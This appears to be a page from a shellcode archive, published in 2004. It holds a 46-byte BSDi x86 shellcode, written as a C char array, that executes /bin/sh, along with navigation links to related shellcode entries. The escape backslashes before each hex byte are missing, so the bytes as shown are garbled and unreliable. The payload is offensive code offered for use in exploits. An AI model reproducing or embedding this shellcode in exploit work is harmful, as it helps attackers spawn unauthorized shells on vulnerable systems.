[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : bsdi/x86 execve /bin/sh 46 bytes
# Published : 2004-09-26
# Author : vade79
# Previous Title : bsd/x86 reverse portbind 129 bytes
# Next Title : bsd/x86 connect 93 bytes


/*
 *  BSDi
 *  execve() of /bin/sh by v9 (v9@fakehalo.org)
 */

static char exec[]=
  "xebx1fx5ex31xc0x89x46xf5x88x46xfax89x46x0c" /* 14 characters. */
  "x89x76x08x50x8dx5ex08x53x56x56xb0x3bx9axff" /* 14 characters. */
  "xffxffxffx07xffxe8xdcxffxffxffx2fx62x69x6e" /* 14 characters. */
  "x2fx73x68x00"; /* 4 characters; 46 characters total. */

# www.Syue.com [2004-09-26]